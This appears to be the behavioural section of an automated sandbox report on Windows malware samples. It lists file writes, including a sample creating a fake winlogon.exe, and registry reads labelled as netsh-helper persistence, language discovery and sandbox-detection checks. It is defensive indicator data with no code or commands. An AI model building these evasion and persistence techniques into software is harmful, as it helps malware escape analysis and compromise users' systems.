File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_1961446077\manifest.fingerprint msedge.exe
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_1903774412\kp_pinslist.pb msedge.exe
File opened for modification C:\Windows\SystemTemp msedge.exe
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_604443294\_metadata\verified_contents.json msedge.exe
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_604443294\manifest.fingerprint msedge.exe
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_1641183958\manifest.fingerprint msedge.exe
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_1903774412\manifest.fingerprint msedge.exe
File opened for modification C:\Windows\winlogon.exe e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_584358136\manifest.json msedge.exe
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_584358136\safety_tips.pb msedge.exe
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_1682189713\keys.json msedge.exe
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_1682189713\_metadata\verified_contents.json msedge.exe
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_787291217\manifest.json msedge.exe
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_787291217\manifest.fingerprint msedge.exe
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_1903774412\crs.pb msedge.exe
File created C:\Windows\assembly\Desktop.ini d4c62215df74753371db33a19a69fccdc4b375c893a4b7f8b30172710fbd4cfa.exe
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_1682189713\LICENSE msedge.exe
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_1682189713\manifest.json msedge.exe
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_1682189713\manifest.fingerprint msedge.exe
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_584358136\_metadata\verified_contents.json msedge.exe
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_1961446077\manifest.json msedge.exe
File created C:\Windows\winlogon.exe e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe
File opened for modification C:\Windows\assembly d4c62215df74753371db33a19a69fccdc4b375c893a4b7f8b30172710fbd4cfa.exe
File opened for modification C:\Windows\assembly\Desktop.ini d4c62215df74753371db33a19a69fccdc4b375c893a4b7f8b30172710fbd4cfa.exe
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_383677895\regex_patterns.json msedge.exe
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_383677895\manifest.fingerprint msedge.exe
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_584358136\manifest.fingerprint msedge.exe
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_16235238\manifest.fingerprint msedge.exe
-
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe
-
System Location Discovery: System Language Discovery 1 TTPs 56 IoCs
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tmp1.jpg
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language {34184A33-0407-212E-3320-09040709E2C2}.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language {34184A33-0407-212E-3320-09040709E2C2}.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language a30306497eb18f549407b8e26ffeb285405433cb160a6001b8aede53e3accfd3.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WMIC.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language {34184A33-0407-212E-3320-09040709E2C2}.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ipconfig.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language {34184A33-0407-212E-3320-09040709E2C2}.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language {34184A33-0407-212E-3320-09040709E2C2}.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 537a2fd4d214a212df06fb73b19ba945672eaf18d64cc30d8e99ab6a0d7cb9ba.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language d765e722e295969c0a5c2d90f549db8b89ab617900bf4698db41c7cdad993bb9.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language csc.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language winlogon.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language winlogon.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe
-
Checks SCSI registry key(s) 3 TTPs 64 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 dwm.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A explorer.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 explorer.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 explorer.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 explorer.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A explorer.exe
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID explorer.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A explorer.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 dwm.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A explorer.exe
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID explorer.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000 explorer.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 explorer.exe
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\HardwareID explorer.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A explorer.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0002 explorer.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 explorer.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 explorer.exe
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\HardwareID explorer.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003 explorer.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A explorer.exe
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Capabilities explorer.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 explorer.exe
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID explorer.exe
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID explorer.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 explorer.exe
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags explorer.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002 explorer.exe
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags explorer.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 explorer.exe
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName explorer.exe
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName explorer.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0002 explorer.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001 explorer.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 explorer.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000 explorer.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C explorer.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C explorer.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 explorer.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A explorer.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003 explorer.exe
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID dwm.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A explorer.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002 explorer.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 explorer.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 explorer.exe
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\HardwareID explorer.exe
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Capabilities explorer.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 explorer.exe
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\FriendlyName explorer.exe
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID explorer.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A explorer.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C explorer.exe
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Capabilities explorer.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C explorer.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 explorer.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 explorer.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C explorer.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A explorer.exe
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\HardwareID explorer.exe
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags dwm.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 explorer.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000 explorer.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 explorer.exe
-
Checks processor information in registry 2 TTPs 64 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 dw20.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString firefox.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString dw20.exe
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe
